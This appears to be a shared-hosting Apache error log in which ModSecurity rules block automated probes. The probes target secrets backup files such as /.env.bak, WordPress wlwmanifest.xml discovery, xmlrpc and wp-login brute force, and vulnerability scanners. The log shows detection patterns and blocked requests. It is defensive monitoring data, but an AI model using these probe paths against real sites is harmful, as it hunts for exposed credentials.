[Tue May 26 16:46:19.732657 2026] [security2:error] [pid 823496:tid 823652] [client 208.84.101.17:60600] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "swamijifoundation.in.svijaykumar.in"] [uri "/.env.orig"] [unique_id "ahWBA5a08mrtyBNpA4PUPQAAABg"]
[Tue May 26 16:46:19.732807 2026] [security2:error] [pid 823496:tid 823697] [client 208.84.101.17:60540] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "swamijifoundation.in.svijaykumar.in"] [uri "/.env.bak"] [unique_id "ahWBA5a08mrtyBNpA4PUQAAAAEU"]
[Tue May 26 16:46:19.732838 2026] [security2:error] [pid 823496:tid 823646] [client 208.84.101.17:60622] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "swamijifoundation.in.svijaykumar.in"] [uri "/.env.local.bak"] [unique_id "ahWBA5a08mrtyBNpA4PUOwAAABI"]
[Tue May 26 16:46:19.733302 2026] [security2:error] [pid 823496:tid 823710] [client 208.84.101.17:60638] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "swamijifoundation.in.svijaykumar.in"] [uri "/.env.local.old"] [unique_id "ahWBA5a08mrtyBNpA4PUOQAAAFI"]
[Tue May 26 16:46:19.733362 2026] [security2:error] [pid 823496:tid 823687] [client 208.84.101.17:60612] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "swamijifoundation.in.svijaykumar.in"] [uri "/.env.copy"] [unique_id "ahWBA5a08mrtyBNpA4PUPAAAADs"]
[Tue May 26 16:46:19.733740 2026] [security2:error] [pid 823496:tid 823720] [client 208.84.101.17:60672] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "swamijifoundation.in.svijaykumar.in"] [uri "/.env.local.orig"] [unique_id "ahWBA5a08mrtyBNpA4PUQQAAAFw"]
[Tue May 26 16:46:21.076974 2026] [security2:error] [pid 823496:tid 823683] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBA5a08mrtyBNpA4PUKAAAADc"]
[Tue May 26 16:46:22.709143 2026] [security2:error] [pid 823496:tid 823700] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBBJa08mrtyBNpA4PUUQAAAEg"]
[Tue May 26 16:46:23.771476 2026] [security2:error] [pid 823496:tid 823654] [client 117.198.37.168:62635] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWBB5a08mrtyBNpA4PUcQAAABo"]
[Tue May 26 16:46:23.771600 2026] [security2:error] [pid 823496:tid 823654] [client 117.198.37.168:62635] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWBB5a08mrtyBNpA4PUcQAAABo"]
[Tue May 26 16:46:24.805735 2026] [security2:error] [pid 817651:tid 817875] [client 62.60.130.233:64371] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "krishnawoodworks.com"] [uri "/wp-login.php"] [unique_id "ahWBCNlGRCPPN1dS2y217AAAAOM"], referer: https://duckduckgo.com/
[Tue May 26 16:46:25.140295 2026] [security2:error] [pid 817651:tid 817831] [client 62.60.130.233:50808] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "krishnawoodworks.com"] [uri "/wp-login.php"] [unique_id "ahWBCdlGRCPPN1dS2y217gAAALc"], referer: https://www.facebook.com/
[Tue May 26 16:46:25.238636 2026] [security2:error] [pid 817651:tid 817894] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBB9lGRCPPN1dS2y21vwAAAPY"]
[Tue May 26 16:46:27.036654 2026] [security2:error] [pid 823496:tid 823722] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBCZa08mrtyBNpA4PUhQAAAF4"]
[Tue May 26 16:46:28.372583 2026] [security2:error] [pid 817651:tid 817766] [remote 47.128.127.252:13050] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "staging.unsobered.com"] [uri "/feature-post/bacardi-india-introduces-good-man-its-first-india-made-brandy/"] [unique_id "ahWBDNlGRCPPN1dS2y22DAAAtHI"]
[Tue May 26 16:46:28.952583 2026] [security2:error] [pid 817651:tid 817801] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBC9lGRCPPN1dS2y22BAAAAJk"]
[Tue May 26 16:46:30.833457 2026] [security2:error] [pid 823496:tid 823654] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBDZa08mrtyBNpA4PUogAAABo"]
[Tue May 26 16:46:32.484729 2026] [autoindex:error] [pid 823496:tid 823696] [client 43.134.178.104:0] AH01276: Cannot serve directory /home2/glorolle/public_html/proxuber.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://www.proxuber.com
[Tue May 26 16:46:32.904183 2026] [security2:error] [pid 823496:tid 823711] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBD5a08mrtyBNpA4PUtAAAAFM"]
[Tue May 26 16:46:34.206480 2026] [security2:error] [pid 817651:tid 817795] [client 117.198.37.168:62960] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWBEtlGRCPPN1dS2y22SQAAAJM"]
[Tue May 26 16:46:34.206591 2026] [security2:error] [pid 817651:tid 817795] [client 117.198.37.168:62960] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWBEtlGRCPPN1dS2y22SQAAAJM"]
[Tue May 26 16:46:34.683094 2026] [security2:error] [pid 823496:tid 823733] [client 45.154.98.38:49190] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "grcorp.moes-art.com"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahWBEpa08mrtyBNpA4PU0wAAAGk"]
[Tue May 26 16:46:34.860263 2026] [security2:error] [pid 823496:tid 823670] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBEZa08mrtyBNpA4PUxQAAACo"]
[Tue May 26 16:46:36.046024 2026] [security2:error] [pid 823496:tid 823649] [client 45.154.98.38:57573] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "grcorp.moes-art.com"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahWBFJa08mrtyBNpA4PU4gAAABU"]
[Tue May 26 16:46:36.178078 2026] [security2:error] [pid 823496:tid 823661] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBE5a08mrtyBNpA4PU1QAAACE"]
[Tue May 26 16:46:36.437268 2026] [security2:error] [pid 823496:tid 823685] [client 45.154.98.38:55901] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "grcorp.moes-art.com"] [uri "/web/wp-includes/wlwmanifest.xml"] [unique_id "ahWBFJa08mrtyBNpA4PU4wAAADk"]
[Tue May 26 16:46:36.835813 2026] [security2:error] [pid 823496:tid 823748] [client 45.154.98.38:50507] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "grcorp.moes-art.com"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahWBFJa08mrtyBNpA4PU6gAAAHg"]
[Tue May 26 16:46:36.980020 2026] [security2:error] [pid 823496:tid 823637] [client 98.221.251.141:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBE5a08mrtyBNpA4PU2gAAAAk"]
[Tue May 26 16:46:37.240186 2026] [security2:error] [pid 823496:tid 823666] [client 45.154.98.38:54185] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "grcorp.moes-art.com"] [uri "/website/wp-includes/wlwmanifest.xml"] [unique_id "ahWBFZa08mrtyBNpA4PU8AAAACY"]
[Tue May 26 16:46:37.652369 2026] [security2:error] [pid 823496:tid 823671] [client 114.119.137.70:34531] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.rsmsi.org.in"] [uri "/rsmsi-regalia.php"] [unique_id "ahWBFZa08mrtyBNpA4PU9AAAACs"], referer: http://www.rsmsi.org.in/
[Tue May 26 16:46:37.715613 2026] [security2:error] [pid 823496:tid 823723] [client 45.154.98.38:60888] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "grcorp.moes-art.com"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahWBFZa08mrtyBNpA4PU9QAAAF8"]
[Tue May 26 16:46:38.101251 2026] [security2:error] [pid 823496:tid 823744] [client 45.154.98.38:51198] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "grcorp.moes-art.com"] [uri "/news/wp-includes/wlwmanifest.xml"] [unique_id "ahWBFpa08mrtyBNpA4PU-wAAAHQ"]
[Tue May 26 16:46:38.133672 2026] [core:crit] [pid 823496:tid 823677] (13)Permission denied: [client 52.167.144.18:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 16:46:38.176378 2026] [security2:error] [pid 823496:tid 823695] [client 114.119.148.237:32189] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/cart"] [unique_id "ahWBFpa08mrtyBNpA4PVAAAAAEM"], referer: http://haddingtonwines.com/cart?remove_item=37bf8bb245c5ae952fb107153f18958f
[Tue May 26 16:46:38.531421 2026] [security2:error] [pid 817651:tid 817881] [client 45.154.98.38:63504] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "grcorp.moes-art.com"] [uri "/2018/wp-includes/wlwmanifest.xml"] [unique_id "ahWBFtlGRCPPN1dS2y22cgAAAOk"]
[Tue May 26 16:46:38.674617 2026] [security2:error] [pid 817651:tid 817818] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBFdlGRCPPN1dS2y22awAAAKo"]
[Tue May 26 16:46:38.933816 2026] [security2:error] [pid 817651:tid 817888] [client 45.154.98.38:53538] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "grcorp.moes-art.com"] [uri "/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahWBFtlGRCPPN1dS2y22dAAAAPA"]
[Tue May 26 16:46:39.293865 2026] [security2:error] [pid 817651:tid 817784] [client 45.154.98.38:62309] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "grcorp.moes-art.com"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahWBF9lGRCPPN1dS2y22eQAAAIg"]
[Tue May 26 16:46:39.749555 2026] [security2:error] [pid 817651:tid 817896] [client 45.154.98.38:51338] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "grcorp.moes-art.com"] [uri "/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahWBF9lGRCPPN1dS2y22fgAAAPg"]
[Tue May 26 16:46:40.321678 2026] [security2:error] [pid 817651:tid 817828] [client 45.154.98.38:55143] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "grcorp.moes-art.com"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahWBGNlGRCPPN1dS2y22iwAAALQ"]
[Tue May 26 16:46:40.439620 2026] [security2:error] [pid 817651:tid 817826] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBF9lGRCPPN1dS2y22dgAAALI"]
[Tue May 26 16:46:41.501599 2026] [core:crit] [pid 823496:tid 823685] (13)Permission denied: [client 66.249.70.137:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 16:46:42.539090 2026] [security2:error] [pid 817651:tid 817876] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBGdlGRCPPN1dS2y22oAAAAOQ"]
[Tue May 26 16:46:43.139926 2026] [security2:error] [pid 817651:tid 817836] [client 45.154.98.38:65518] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "grcorp.moes-art.com"] [uri "/media/wp-includes/wlwmanifest.xml"] [unique_id "ahWBG9lGRCPPN1dS2y22sgAAALw"]
[Tue May 26 16:46:43.961160 2026] [security2:error] [pid 823496:tid 823723] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBG5a08mrtyBNpA4PVKQAAAF8"]
[Tue May 26 16:46:44.578514 2026] [security2:error] [pid 823496:tid 823654] [client 117.198.37.168:63274] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWBHJa08mrtyBNpA4PVNwAAABo"]
[Tue May 26 16:46:44.578710 2026] [security2:error] [pid 823496:tid 823654] [client 117.198.37.168:63274] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWBHJa08mrtyBNpA4PVNwAAABo"]
[Tue May 26 16:46:44.634071 2026] [security2:error] [pid 823496:tid 823712] [client 45.154.98.38:64086] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "grcorp.moes-art.com"] [uri "/wp2/wp-includes/wlwmanifest.xml"] [unique_id "ahWBHJa08mrtyBNpA4PVOAAAAFQ"]
[Tue May 26 16:46:45.414591 2026] [security2:error] [pid 817651:tid 817722] [remote 216.73.216.30:10931] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWBHdlGRCPPN1dS2y22yAAAuUY"]
[Tue May 26 16:46:46.036088 2026] [security2:error] [pid 823496:tid 823719] [client 45.154.98.38:62597] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "grcorp.moes-art.com"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahWBHpa08mrtyBNpA4PVRAAAAFs"]
[Tue May 26 16:46:46.056249 2026] [security2:error] [pid 823496:tid 823628] [client 181.129.6.187:55646] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahWBHJa08mrtyBNpA4PVNAAAAHw"], referer: https://avalturistica.com/
[Tue May 26 16:46:46.056425 2026] [security2:error] [pid 823496:tid 823628] [client 181.129.6.187:55646] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.jhonweb.com"] [uri "/index.php"] [unique_id "ahWBHJa08mrtyBNpA4PVNQAAAGI"], referer: https://avalturistica.com/
[Tue May 26 16:46:46.277393 2026] [security2:error] [pid 817651:tid 817869] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBHdlGRCPPN1dS2y22zAAAAN0"]
[Tue May 26 16:46:46.611893 2026] [security2:error] [pid 817651:tid 817878] [client 45.154.98.38:52924] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "grcorp.moes-art.com"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahWBHtlGRCPPN1dS2y229AAAAOY"]
[Tue May 26 16:46:47.352565 2026] [security2:error] [pid 823496:tid 823683] [client 153.75.250.143:28506] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 143.250.75.153.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.tea.canopykaapi.com"] [uri "/wp-content/themes/bootstrap-ultimate/docs/thanks.php"] [unique_id "ahWBH5a08mrtyBNpA4PVVgAAADc"]
[Tue May 26 16:46:47.371748 2026] [security2:error] [pid 817651:tid 817907] [client 45.154.98.38:50741] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "grcorp.moes-art.com"] [uri "/sito/wp-includes/wlwmanifest.xml"] [unique_id "ahWBH9lGRCPPN1dS2y22-wAAAQM"]
[Tue May 26 16:46:48.682159 2026] [security2:error] [pid 823496:tid 823752] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBIJa08mrtyBNpA4PVWgAAAHw"]
[Tue May 26 16:46:49.505592 2026] [core:crit] [pid 823496:tid 823702] (13)Permission denied: [client 52.167.144.206:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 16:46:49.719994 2026] [security2:error] [pid 823496:tid 823654] [client 185.191.171.8:38334] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/list/"] [unique_id "ahWBIZa08mrtyBNpA4PVbgAAABo"]
[Tue May 26 16:46:49.720153 2026] [security2:error] [pid 823496:tid 823654] [client 185.191.171.8:38334] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/list/"] [unique_id "ahWBIZa08mrtyBNpA4PVbgAAABo"]
[Tue May 26 16:46:50.527735 2026] [security2:error] [pid 823496:tid 823695] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBIZa08mrtyBNpA4PVcQAAAEM"]
